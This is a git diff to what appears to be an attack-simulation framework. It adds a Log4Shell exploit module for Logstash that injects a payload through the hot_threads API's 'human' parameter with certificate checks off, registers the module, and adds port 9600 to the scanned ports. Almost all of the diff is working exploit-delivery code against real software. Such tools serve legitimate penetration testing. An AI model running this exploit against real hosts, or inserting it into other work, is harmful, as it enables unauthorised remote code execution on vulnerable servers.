diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py index e1b1595d2..101db8f24 100644 --- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py +++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py @@ -4,7 +4,8 @@ from .i_service_exploiter import IServiceExploiter from .poc_docker import DockerPOCExploit from .solr import SolrExploit from .tomcat import TomcatExploit +from .logstash import LogStashExploit def get_log4shell_service_exploiters() -> List[IServiceExploiter]: - return [DockerPOCExploit(), SolrExploit(), TomcatExploit()] + return [DockerPOCExploit(), SolrExploit(), TomcatExploit(), LogStashExploit()] diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py new file mode 100644 index 000000000..ae0f93608 --- /dev/null +++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py @@ -0,0 +1,20 @@ +from logging import getLogger + +import requests + +from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter +from infection_monkey.model import VictimHost + +logger = getLogger(__name__) + + +class LogStashExploit(IServiceExploiter): + service_name = "LogStash" + + @staticmethod + def trigger_exploit(payload: str, host: VictimHost, port: int): + url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}" + try: + resp = requests.get(url, timeout=5, verify=False) # noqa DUO123 + except requests.ReadTimeout as e: + logger.debug(f"Log4shell request failed {e}") diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py b/monkey/monkey_island/cc/services/config_schema/internal.py index dff4e8a13..bb6078912 100644 --- a/monkey/monkey_island/cc/services/config_schema/internal.py +++ b/monkey/monkey_island/cc/services/config_schema/internal.py @@ -129,7 +129,7 @@ INTERNAL = { "type": "array", "uniqueItems": True, "items": {"type": "integer"}, - "default": [80, 8080, 443, 8008, 7001, 9200, 8983], + "default": [80, 8080, 443, 8008, 7001, 9200, 8983, 9600], "description": "List of ports the monkey will check if are being used " "for HTTP", },